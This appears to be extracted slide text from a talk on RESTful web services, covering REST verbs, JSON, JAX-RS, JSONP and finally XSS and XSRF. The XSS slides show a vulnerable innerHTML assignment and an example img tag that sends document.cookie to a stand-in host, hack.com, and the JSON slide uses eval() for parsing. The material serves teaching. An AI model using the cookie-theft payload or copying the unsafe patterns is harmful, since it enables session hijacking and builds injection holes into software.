By Loukik Purohit & Rohit Ghatol Restful Web Services By Loukik Purohit & Rohit Ghatol

Web Service Browser Messages(xml/json ) Desktop CricInfo Mobile

Using Browser User Intervention Cab Booking Plane Booking Hotel Booking Vacation Subsystem User Intervention

Automated Machines interacting with each other Cab Booking Plane Booking SMS/Email Hotel Booking Vacation Subsystem Machines interacting with each other

Rest in terms of Layman HR Accounts Admin

Organized structure To get address of user 1 , go to : \Organisation\Users\1\address

Same analogy applies to Web Request to get all users http://xyz.com/users Request to get user 1 http://xyz.com/users/1 Request to get address of user 1 http://xyz.com/users/1/address

Request-Response GET Response <users> <id>1</id> <name>Loukik</address> <address>Pune</address> <skill>java</skill> </id> <id>2</id> <name>...</address> <address>…</address> <skill>…</skill> </users> GET Request GET /users/1 HTTP/1.1 Host: xyz.com Accept: application/xml

Request-Response POST Response POST Request GET /users HTTP/1.1 Host: xyz.com Content Type: application/xml Accept: application/xml <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users> POST Response <result> <id>3</id> </result>

HTTP http://xyz.com/services/users HTTP Headers Method:PUT Accept:application/xml Content-Type:application/xml HTTP Body <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users>

Four verbs for every noun GET POST DELETE PUT http://example.com/customer/123

JSON Can Data be Represented in form of List and a Map?? Here’s JSON var myObject = eval('(' + myJSONtext + ')');

JSON Parser

How JSON looks like Accessing json in javascript code var result= { "users":[{ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" }, { "id":"2", "name":"rohit", "skill":"C++“ } ] Accessing json in javascript code result.users[0].name=“loukik”

REST

Your Source to 3000+ Web Service APIs Programmable Web Your Source to 3000+ Web Service APIs

programmableweb.com

Implement Restful Webservice Write a Servlet Implement doGet, doPost, doDelete Write business logic Create your Messages, that too JSON

JAX-RS To rescue Marrying to API EJB Servlet Being POJO (Single) is Great! JAX-RS

JAX-RS JSR 311: JAX-RS More info at http://java.sun.com/javaee/6/docs/tutorial/doc/giepu.html

JAXB-@XMLRootElement JAX-RS Flow HTTP Request JSON POJO Model JAX-RS Servlet JAXB-@XMLRootElement Business Logic HTTP Response POJO Model JSON

Spring REST Based on Spring MVC

Spring REST Negotiated view-based rendering HTTP message converters

Enunciate Enunciate Your Web service API Your Web service API + Full HTML documentation + Client-side libraries Enunciate

What does Enunciate do for me? Java Doc C JAX-RS ObjC POJO Client SOAP Comm .Net GWT AMF Java Json What does Enunciate do for me?

Enunciate Enunciate is an engine for dramatically enhancing your Java Web service API. Enunciate is primarily a build-time tool. Develop your Web service API. Attach Enunciate to your build process.

Cross Site Scripting Single Origin Policy http://geochirp.com maps.google.com http://geochirp.com Ajax Calls twitter.com

Single Origin Policy Imposed by Browser Ajax Restrictions Accessing iFrame’s DOM http://www.abc.com ABC.com JavaScript Iframe http://xyz.com XYZ.com

So How to do Mashups? Use Proxy http://geochirp.com/proxy maps.google.com http://geochirp.com twitter.com

So How to do Mashups? Use JSONP http://geochirp.com maps.google.com JSONP Call twitter.com JSONP Call

AJAX Call Not Allowed By Browser What is JSONP? ABC.com ABC.com Static Script http://xyz.com/script.js XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

AJAX Call Not Allowed By Browser What is JSONP? ABC.com ABC.com Dynamic Script http://xyz.com/services/users/1?callback=myfun XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

JSONP Explained Single Origin Policy No Such Restriction http://xyz.com/services/users/1?callback=myfunc JSON JSONP { "id":"1", "name":"loukik", "address":"Pune", "skill":"java“ } myfunc({ "id":"1", "name":"loukik", "address":"Pune", "skill":"java“ }); Single Origin Policy No Such Restriction

JSONP Code Example

<html> <head> <script> function myfunc(data){ table <html> <head> <script> function myfunc(data){ table.update(data); } </script> </head> <body> <table> <!-- employee table --> <tr><td>Name </td><td> Address </td><td> Role</td></tr> <tr><td>Rohit </td><td> Pune </td><td> Architect</td></tr> <tr><td>Loukik </td><td> Pune </td><td>Geek</td></tr> </table> <button id="add employee" >Add </button> <button id="next100" >NExt 100</button> <script src="http://xyz.com/services/fetchemployess?page=1&jsonp=myfunc"></script> </body> </html>

XSS Attacker Hacked!!! ScrapBook WebSite User <script> attack script</script> Login Hacked!!! ScrapBook WebSite User

How to do XSS? Server needs an XSS Vulnerability What if I put an html with some JavaScript here? Server needs an XSS Vulnerability Say Dev uses div.innerHTML in code TextArea function postScrap(){ div.innerHTML = textarea.value; } Post DIV

How to do XSS? Server needs an XSS Vulnerability Say Dev uses div.innerHTML in code <h1>Look at this cool image</h1> <img src='http://hack.com/?cookie=" + encodeURI(document.cookie)'> </img> function postScrap(){ div.innerHTML = textarea.value; }

XSRF Cross Site Request Forgery. Unauthorized commands are transmitted from a user that the website trusts. Exploits the trust that a site has in a user's browser.

XSRF User ScrapBook WebSite Hacked!!! Attacker Login Opens Mail Send Mail with Script ScrapBook WebSite Hacked!!! Attacker

How to do XSRF Is it Possible? Browser holds your sessions What if I made you visit a page which uses your session to do hack? Is it Possible?

Aye Mate! How come I can use Google + and Facebook Like here?